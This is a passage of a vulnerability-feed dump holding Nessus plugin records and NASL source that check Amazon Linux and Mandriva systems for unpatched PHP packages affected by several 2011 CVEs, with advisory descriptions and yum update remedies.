a\nnon-ASCII character (one with the high bit set) had no effect on the\nhash result, thus shortening the effective password length. This made\nbrute-force guessing more efficient as several different passwords\nwere hashed to the same value.\n\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, PostgreSQL before 8.4.9, and other products, does not\nproperly handle 8-bit characters, which makes it easier for\ncontext-dependent attackers to determine a cleartext password by\nleveraging knowledge of a password hash.\n\nA stack-based buffer overflow flaw was found in the way the PHP socket\nextension handled long AF_UNIX socket addresses. An attacker able to\nmake a PHP script connect to a long AF_UNIX socket address could use\nthis flaw to crash the PHP interpreter.\n\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\nAn off-by-one flaw was found in PHP. If an attacker uploaded a file\nwith a specially crafted file name it could cause a PHP script to\nattempt to write a file to the root (/) directory. By default, PHP\nruns as the 'apache' user, preventing it from writing to the root\ndirectory.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments.\n\nA use-after-free flaw was found in the PHP substr_replace() function.\nIf a PHP script used the same variable as multiple function arguments,\na remote attacker could possibly use this to crash the PHP interpreter\nor, possibly, execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-7.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-bcmath-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-cli-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-common-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-dba-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-debuginfo-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-devel-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-embedded-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-fpm-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-gd-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-imap-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-intl-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-ldap-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mbstring-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mcrypt-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mssql-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mysql-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-odbc-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pdo-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pgsql-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-process-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pspell-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-snmp-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-soap-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-tidy-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xml-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xmlrpc-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-zts-5.3.8-3.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:17:56", "description": "The MITRE CVE database describes these CVEs as :\n\nRevert is_a() behavior to php <= 5.3.6 and add a new new option\n(allow_string) for the new behavior (accept string and raise autoload\nif needed)\n\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments.\n\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, does not properly handle 8-bit characters, which makes it\neasier for context-dependent attackers to determine a cleartext\npassword by leveraging knowledge of a password hash.\n\nPHP before 5.3.7 does not properly check the return values of the\nmalloc, calloc, and realloc library functions, which allows\ncontext-dependent attackers to cause a denial of service (NULL pointer\ndereference and application crash) or trigger a buffer overflow by\nleveraging the ability to provide an arbitrary value for a function\nargument, related to (1) ext/curl/interface.c, (2)\next/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4)\next/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6)\next/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8)\next/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10)\nTSRM/tsrm_win32.c, and (11) the strtotime function.", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : php (ALAS-2011-07)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3379", "CVE-2011-2202"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php-debuginfo", "p-cpe:/a:amazon:linux:php-xml", "p-cpe:/a:amazon:linux:php-odbc", "p-cpe:/a:amazon:linux:php-mcrypt", "p-cpe:/a:amazon:linux:php-snmp", "p-cpe:/a:amazon:linux:php-mbstring", "p-cpe:/a:amazon:linux:php-cli", "p-cpe:/a:amazon:linux:php-zts", "p-cpe:/a:amazon:linux:php-embedded", "p-cpe:/a:amazon:linux:php-common", "p-cpe:/a:amazon:linux:php-ldap", "p-cpe:/a:amazon:linux:php-devel", "p-cpe:/a:amazon:linux:php-gd", "p-cpe:/a:amazon:linux:php-bcmath", "p-cpe:/a:amazon:linux:php-xmlrpc", "p-cpe:/a:amazon:linux:php-intl", "p-cpe:/a:amazon:linux:php", "p-cpe:/a:amazon:linux:php-process", "p-cpe:/a:amazon:linux:php-fpm", "p-cpe:/a:amazon:linux:php-pspell", "p-cpe:/a:amazon:linux:php-dba", "p-cpe:/a:amazon:linux:php-pdo", "p-cpe:/a:amazon:linux:php-pgsql", "p-cpe:/a:amazon:linux:php-imap", "p-cpe:/a:amazon:linux:php-mysql", "p-cpe:/a:amazon:linux:php-soap", "p-cpe:/a:amazon:linux:php-tidy", "p-cpe:/a:amazon:linux:php-mssql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-07.NASL", "href": "https://www.tenable.com/plugins/nessus/69566", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-07.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69566);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/01/27 16:45:01 $\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3379\");\n script_xref(name:\"ALAS\", value:\"2011-07\");\n\n script_name(english:\"Amazon Linux AMI : php (ALAS-2011-07)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes these CVEs as :\n\nRevert is_a() behavior to php <= 5.3.6 and add a new new option\n(allow_string) for the new behavior (accept string and raise autoload\nif needed)\n\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments.\n\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, does not properly handle 8-bit characters, which makes it\neasier for context-dependent attackers to determine a cleartext\npassword by leveraging knowledge of a password hash.\n\nPHP before 5.3.7 does not properly check the return values of the\nmalloc, calloc, and realloc library functions, which allows\ncontext-dependent attackers to cause a denial of service (NULL pointer\ndereference and application crash) or trigger a buffer overflow by\nleveraging the ability to provide an arbitrary value for a function\nargument, related to (1) ext/curl/interface.c, (2)\next/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4)\next/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6)\next/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8)\next/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10)\nTSRM/tsrm_win32.c, and (11) the strtotime function.\"\n );\n # https://admin.fedoraproject.org/updates/php-5.3.8-1.fc15,php-eaccelerator-0.9.6.1-9.fc15,maniadrive-1.2-32.fc15\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f94687c5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://admin.fedoraproject.org/updates/php-5.3.8-3.fc15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-7.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum upgrade php*' to upgrade your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-bcmath-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-cli-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-common-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-dba-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-debuginfo-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-devel-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-embedded-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-fpm-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-gd-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-imap-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-intl-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-ldap-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mbstring-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mcrypt-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mssql-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mysql-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-odbc-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pdo-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pgsql-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-process-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pspell-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-snmp-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-soap-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-tidy-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xml-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xmlrpc-5.3.8-3.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-zts-5.3.8-3.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:53:28", "description": "Multiple vulnerabilities has been identified and fixed in php :\n\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments\n(CVE-2011-1148).\n\nThe (1) ZipArchive::addGlob and (2) ZipArchive::addPattern functions\nin ext/zip/php_zip.c in PHP 5.3.6 allow context-dependent attackers to\ncause a denial of service (application crash) via certain flags\narguments, as demonstrated by (a) GLOB_ALTDIRFUNC and (b) GLOB_APPEND\n(CVE-2011-1657).\n\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket (CVE-2011-1938).\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a file path injection\nvulnerability. (CVE-2011-2202).\n\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, does not properly handle 8-bit characters, which makes it\neasier for context-dependent attackers to determine a cleartext\npassword by leveraging knowledge of a password hash (CVE-2011-2483).\n\nPHP before 5.3.7 does not properly check the return values of the\nmalloc, calloc, and realloc library functions, which allows\ncontext-dependent attackers to cause a denial of service (NULL pointer\ndereference and application crash) or trigger a buffer overflow by\nleveraging the ability to provide an arbitrary value for a function\nargument, related to (1) ext/curl/interface.c, (2)\next/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4)\next/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6)\next/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8)\next/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10)\nTSRM/tsrm_win32.c, and (11) the strtotime function (CVE-2011-3182).\n\nPHP before 5.3.7 does not properly implement the error_log function,\nwhich allows context-dependent attackers to cause a denial of service\n(application crash) via unspecified vectors (CVE-2011-3267).\n\nBuffer overflow in the crypt function in PHP before 5.3.7 allows\ncontext-dependent attackers to have an unspecified impact via a long\nsalt argument, a different vulnerability than CVE-2011-2483\n(CVE-2011-3268).\n\nThe updated php packages have been upgraded to 5.3.8 which is not\nvulnerable to these issues.\n\nAdditionally some of the PECL extensions has been upgraded and/or\nrebuilt for the new php version.", "edition": 26, "published": "2011-11-04T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2011:165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-1657", "CVE-2011-3268", "CVE-2011-3182", "CVE-2011-3267", "CVE-2011-2202"], "modified": "2011-11-04T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-sqlite3", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-sybase_ct", "p-cpe:/a:mandriva:linux:php-sphinx", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-apc", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sasl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-pinba", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-mcal", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:php-fileinfo", "p-cpe:/a:mandriva:linux:php-fpm", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-ssh2", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:apache-mod_php", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-phar", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-doc", "p-cpe:/a:mandriva:linux:php-enchant", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-xdebug", 